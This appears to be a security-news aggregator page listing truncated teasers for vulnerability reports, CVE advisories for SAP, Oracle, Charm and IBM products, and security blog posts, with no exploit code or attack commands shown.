U.S. Dept Of Defense: Reflected XSS [██████]

Reflected cross-site scripting XSS arises when an application receives data in an HTTP request and includes that data within the immediate response in an unsafe way. An attacker can execute JavaScript arbitrary code on the victim's session. Steps To Reproduce Go to this URL:...

SAP Business One has unspecified vulnerabilities

SAP Business One is a suite of enterprise management software from SAP, a German company. SAP Business One has a security vulnerability that stems from a lack of authorization checks in the service level components, which could be exploited by an attacker to read, modify, or delete restricted dat...

How profiling employee working hours helps to detect security incidents

At the TimeMachine company there are two special old friends Bob and Alice. Bob, as a team manager, usually has a very busy schedule filled with meetings all day long. You can even find him working late into the night trying to catch up on email he received during the day. Alice on the other hand...

Connected Farms Easy Pickings for Global Food Supply-Chain Hack

A group of hackers made an unnerving DEF CON 29 presentation showing how the sprawling growth of digital and automated farming has left the world’s food supply chain vulnerable to cyberattack. A video for DEF CON 29 hacker conference this week put out by the group Sick Codes explained that modern...

Information Leakage Vulnerability in SSL VPN of Beijing NetGalaxy Information Technology Co.

Beijing Nethub Information Technology Co., Ltd. was renamed from Lenovo Nethub Technology Beijing Co., Ltd. and its business covers network border security protection, application and data security protection, network-wide security risk management, professional security solutions and professional...

Securing Personally Identifiable Information (PII) in web applications

PII is the acronym for “personally identifiable information”. What this means in the explicit language is information exclusive to a specific individual. Due to its exclusivity, it serves the purpose of identifying, locating, and securing specific persons. For instance, think of that specific...

CVE-2021-37587

In Charm 0.43, any single user can decrypt DAC-MACS or MA-ABE-YJ14 data...

CVE-2021-37588

CVE-2021-37588 (Charm 0.43) : Charm 0.43 contains a cryptographic issue that allows any two users to collude to decrypt YCT14 data. The vulnerability is documented across multiple sources (NVD, Red Hat, OSV, CNNVD, etc.), indicating a cryptographic flaw rather than a typical software bug in a sin...

Anyone for Alphabet Soup? ZTNA, SWGs, MFA, and More: Lessons Learned from Fed Day CyberThreats 2021

Last week, we gathered a few of the most prominent leaders and experts from every corner of the federal space to talk about all things cybersecurity and digital transformation. Discussions ranged from the move toward Zero Trust Network Access ZTNA, and effectively managing identities and access...

How to protect your CAD data files with MIP and HALOCAD

This blog post is part of the Microsoft Intelligent Security Association guest blog series. Learn more about MISA. Computer-aided design CAD files are used by design professionals in the manufacturing, engineering, architecture, surveying, and construction industries. These highly valuable files...

How to protect your CAD data files with MIP and HALOCAD

This blog post is part of the Microsoft Intelligent Security Association guest blog series. Learn more about MISA. Computer-aided design CAD files are used by design professionals in the manufacturing, engineering, architecture, surveying, and construction industries. These highly valuable files...

Oracle PeopleSoft Enterprise PeopleTools Unauthorized Access Vulnerability (CNVD-2021-54718)

Oracle PeopleSoft Enterprise PeopleTools provides a comprehensive set of development tools to support the development and runtime of PeopleSoft applications.Oracle PeopleSoft Enterprise PeopleTools versions 8.57, 8.58, 8.59 A security vulnerability exists in the SQR component. An attacker could u...

CVE-2021-2362

Vulnerability in the Oracle Field Service product of Oracle E-Business Suite component: Wireless. Supported versions that are affected are 12.1.1-12.1.3. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Field Service. Successful...

Oracle Outside In Technology has an unspecified vulnerability (CNVD-2021-56432)

Oracle Outside In Technology is a software development kit SDK that provides developers with a comprehensive solution for extracting, normalizing, cleaning, converting, and viewing content in more than 600 unstructured file formats. In Filters component contains a security vulnerability. The...

CVE-2021-2341

Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE component: Networking. Supported versions that are affected are Java SE: 7u301, 8u291, 11.0.11, 16.0.1; Oracle GraalVM Enterprise Edition: 20.3.2 and 21.1.0. Difficult to exploit vulnerability allows...

Oracle Fusion Middleware 安全漏洞

Oracle Outside In Technology is a software development kit SDK that provides developers with a comprehensive solution for extracting, normalizing, cleaning, converting, and viewing content in more than 600 unstructured file formats. In Filters component contains a security vulnerability. The...

How to leverage accountability to ensure sustainable enterprise data security

As post-pandemic economic recovery continues to drive rapid acceleration in digital transformation, documented data breaches and service disruptions caused by cybercriminal activity have become an unwelcome part of our daily news feed. In spite of the regulations and compliance requirements that...

New Zero-Trust API Offers Mobile Carrier Authentication to Developers

Zero Trust is increasingly being adopted as the best strategy to maintain application security and prevent data breaches. To help achieve progress on Zero Trust, there is now a new, easy way to implement continuous user verification by connecting directly to the authentication systems used by...

CVE-2021-33671

SAP NetWeaver Guided Procedures Administration Workset, versions - 7.10, 7.20, 7.30, 7.31, 7.40, 7.50, does not perform necessary authorization checks for an authenticated user, resulting in escalation of privileges. The impact of missing authorization could result to abuse of functionality...

IBM Guardium Data Encryption Information Disclosure Vulnerability

IBM Guardium Data Encryption GDE is a software application from IBM, USA. Provides a data security and compliance solution. A security vulnerability exists in IBM Guardium Data Encryption that stems from the application's failure to properly limit the number of interactions, which could be...